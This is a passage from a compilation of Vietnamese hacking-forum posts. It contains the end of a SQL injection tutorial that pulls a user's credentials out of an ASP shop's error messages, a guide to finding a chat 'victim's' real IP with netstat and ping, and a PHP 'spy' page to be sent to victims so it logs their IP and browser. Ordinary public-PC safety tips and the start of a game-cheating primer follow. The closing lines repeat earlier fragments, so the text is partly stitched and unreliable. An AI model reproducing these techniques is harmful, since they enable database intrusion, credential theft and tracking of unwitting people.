er_id%20not%20in%20('1')))/##sp_password Kết quả Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the varchar value 'agilent1agilent1' to a column of data type int. shopViewProduct.asp, line 115 Như vậy User và Pass của người thứ hai là agilent1agilent1 Đến đây tôi xin kết thúc bài viết của mình. Phần còn lại các bạn có thể tự làm nốt hoặc nghiên cứu gì đó cao siêu hơn. Chúc các bạn Hack vui vẻ và đừng Drop DB của người ta nhé ) ( Tác giả Neo ) ( Admin vnISS+) Hướng dẫn lấy IP của victim khi chát Bài viết từ cd hacker mình share cùng các bạn Rất mong sự góp ý của các bạn Bạn phải chat với Victim dể có sự thiết lập IP. Nói chung là giữ Online Connect với Victim. Mở một cửa sổ DOS prompt Vào C:gõ lệnh sau: netstat -a C:\b netstat -a Lúc dó trên màn hình sẽ xuất hiện 1 số thông tin có dạng nhu sau: Active Connections Proto Local Address Foreign Address State TCP franck-a:0 0.0.0.0:0 LiSTENiNG TCP franck-a:1091 0.0.0.0:0 LiSTENiNG TCP franck-a:1090 server5.syd.www.ozemail.net:80 CLOSE_WAiT TCP franck-a:1099 p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED Chúng ta chỉ chú ý những dòng nào có chữ ESTABLiSHED, dó là thông báo cho sự nối kết dã duợc thiết lập với bên ngoài. Nếu chúng ta chat với nhiều nguời, chat bằng cả Yahoo Messenger nữa thì sẽ có nhiều ESTABLiSHED, do vậy chúng cần chú ý và phân biệt xem ai mới thực sự là Victim của mình. Với ví dụ trên ta thấy p3-max35.auck.ihug.co.nz:1054 ESTABLiSHED là dáng chú ý và quan tâm cả. Còn nếu test trên máy bạn thì nó sẽ khác di nhung ta chỉ cần quan tâm dến dòng tuong tự nhu vậy và có ESTABLiSHED là duợc Việc tiếp theo của chúng ta là Ping Victim này dể lấy duợc IP thật của họ. Cung ở của sổ DOS prompt này, ta gõ lệnh Ping p3-max35.auck.ihug.co.nz :1054 ESTABLiSHED ==è chúng ta không quan tâm cái này nên không cần thêm vào sau lệnh Ping c:p3-max35.auck.ihug.co.nz Wow, thật là tuyệt, tới dây ta dã thấy duợc IP thật của Victim rồi. Pinging p3-max35.auck.ihug.co.nz [209.76.151.67] with 32 bytes of data: Reply from 209.76.151.67: bytes=32 time=1281ms TTL=39 Request timed out. Reply from 209.76.151.67: bytes=32 time=1185ms TTL=39 Request timed out. Ping statistics for 209.76.151.67: Packets: Sent = 4, Received = 2, Lost = 2 (50% loss), Approximate round trIP times in milli-seconds: Minimum = 1185ms, Maximum = 1281ms, Average = 616ms 209.76.151.67 chính là IP mà chúng ta cần tìm của Victim dây. Chúc các bạn thành công Cách này mình đã test thử và phát hiện rất tốt IP của victim Bạn nhớ khi chát với victim nên đóng tất các cửa sổ khác lại,như vậy sẽ chính xác hơn trojon Backdoor(VNISS) sao lại phải 2 bước thế , dùng netstat-na có phải nhanh không. ka ka không thì nhét cái trang này lên host, rồi gửi link cho victim là okiẹ ================================== <html> <head> <title>Spy on yor site code by tapan21 of http://rpg.t28.net/ </title> </head> <table border="5" bg color="white"> <tr> <td><center> <body> <?php // // Spy on your website! Logs in time, ip, the site you came from and browser! // Created by: Tapan21 of http://rpg.t28.net // $spy = fopen("spy.html" , "a"); $site = $HTTP_REFERER; $ip = $REMOTE_ADDR; $browser = $HTTP_USER_AGENT; $time = date("H:i dS F"); echo "The site you came from: " . $_SERVER["HTTP_REFERER"] . "<br />"; echo "ALL IP ADRESSES, TIME, SITE AND YOUR BROWSERS ARE BEING CAPTURED!"; fwrite($spy,"<<<<< BEGIN >>>>><br />"); fwrite($spy,"Site you came from: $site <br />"); fwrite($spy,"IP Address: $ip <br />"); fwrite($spy,"Browser: $browser <br />"); fwrite($spy,"Time: $time <br />"); fwrite($spy,"<<<<< END >>>>><br />"); fclose($spy); ?> </table> </center></td> </tr> </table border> </body> </html> ================================== microlife(VNISS) 6 nguyên tắc cơ bản khi sử dụng PC công cộng bài viết sưu tầm 1. Sử dụng phần mềm chống Spyware Tải phần mềm chống phần mềm gián điệp (spyware) như X-Cleaner của Xblock.com. Phần mềm này có dung lượng rất nhỏ gọn, có thể sử dụng ngay trên đĩa mềm hoặc trên USB mà không cần phải cài đặt. Hãy sử dụng các phần mềm chống gián điệp để quét máy tính công cộng trước khi sử dụng. Đó là một ý kiến hay 2. Không lưu lại những thông tin đăng nhập Thay vì đóng cửa sổ trình duyệt hay gõ vào địa chỉ trang Web khác, bạn hãy thoát khỏi (logout) trang Web bằng nhấn vào nút hoặc liên kết logout trên trang Web. Điều này hạn chế khả năng người sử dụng khác có thể truy cập vào các thông tin trong trang Web mà bạn vừa ghé thăm. Rất nhiều chương trình, đặc biệt là các trình nhắn tin như Yahoo Messenger, MSN, AOL đều có tính năng tự động đăng nhập (login) để lưu lại tên người sử dụng và mật khẩu, giúp người sử dụng không phải gõ lại tên người dùng và mật khẩu. Tính năng này chỉ hữu ích khi sử dụng trên máy tính của riêng bạn, chúng sẽ rất nguy hiểm khi sử dụng ở những máy tính công cộng. Hãy vô hiệu chức năng này mỗi khi sử dụng máy tính công cộng. 3. Bảo vệ mật khẩu Các trình duyệt cũng có khả năng ghi nhớ mật khẩu. Trước khi lướt Web, nếu đang sử dụng Internet Explorer, hãy chọn Tools -> Internet Options, trong thẻ Content, vào AutoComplete và bỏ chọn toàn bộ các mục đánh dấu. Sau khi đã hoàn thành, hãy chọn Tools->Internet Options. Tới thẻ Content, nhấn vào AutoComplete, và chọn Clear Forms và Clear Passwords để xoá toàn bộ mật khẩu và các dữ liệu. 4. Không hiển thị những thông tin nhạy cảm trên màn hình Đừng để máy tính hiển thị những thông tin quan trọng, nhạy cảm như: thông tin cá nhân, mã số tài khoản ngân hàng, mã số thẻ tín dụng Khi có việc cần phải đi ra ngoài một chút, bạn hãy đóng toàn bộ các cửa sổ chương trình, thoát khỏi các cửa sổ có chứa những thông tin nhạy cảm 5. Xoá mọi dấu vết Sau khi sử dụng máy tính công cộng, hãy xoá bỏ mọi tập tin đệm và danh sách History của Internet Explorer. Để xoá các tập tin tạm và History trong IE bạn hãy thực hiện như sau: Trong Internet Explorer, chọn Tools -> Internet Options Trong thẻ General, chọn Temporary Internet files -> Delete Files, nhấn vào Delete Cookies. Dưới mục History, chọn Clear History. 6. Đừng nhập những dữ liệu "nhạy cảm" vào máy tính công cộng Những phương pháp trên có thể cung cấp cho bạn một phương thức chống lại những hành vi quen thuộc của hacker sẽ dùng lại những chiếc máy tính công cộng này sau khi bạn sử dụng. Tuy nhiên, hacker hay những tên ăn trộm chuyên nghiệp có thể sử dụng các phần mềm keylogger để ăn cắp thông tin, email Những công cụ mà chúng sử dụng sẽ vô hiệu hoá, và lấy cắp được thông tin của bạn dễ dàng ngay khi bạn đã xoá mọi dữ liệu liên quan. Vì vậy, để thực sự an toàn, hãy tránh gõ vào số thẻ tín dụng, bất cứ những thông tin tài chính hoặc các thông tin nhạy cảm vào trong máy tính công cộng. Đó là cách sử dụng an toàn nhất cho bạn. backdoor(VNISS) CĂN BẢN VỀ GAME HACKING [Khổng Hoàng Trung Tín] HACK GAME KHÔNG PHẢI LÀ BẺ KHÓA phần mềm mà chỉ là dò tìm các giá trị tài nguyên (gỗ, vàng, sắt ) của game được lưu trong bộ nhớ và sửa thành các giá trị như ý muốn. Nói nôm na thì đó là chơi ăn gian ý mà. Khi bạn sử dụng . phương thức chống lại những hành vi quen thuộc của hacker sẽ dùng lại những chiếc máy tính công cộng này sau khi bạn sử dụng. Tuy nhiên, hacker hay những tên ăn trộm chuyên nghiệp có thể sử. ( Tác giả Neo ) ( Admin vnISS+) Hướng dẫn lấy IP của victim khi chát Bài viết từ cd hacker mình share cùng các bạn Rất mong sự góp ý của các bạn Bạn phải chat với Victim dể có sự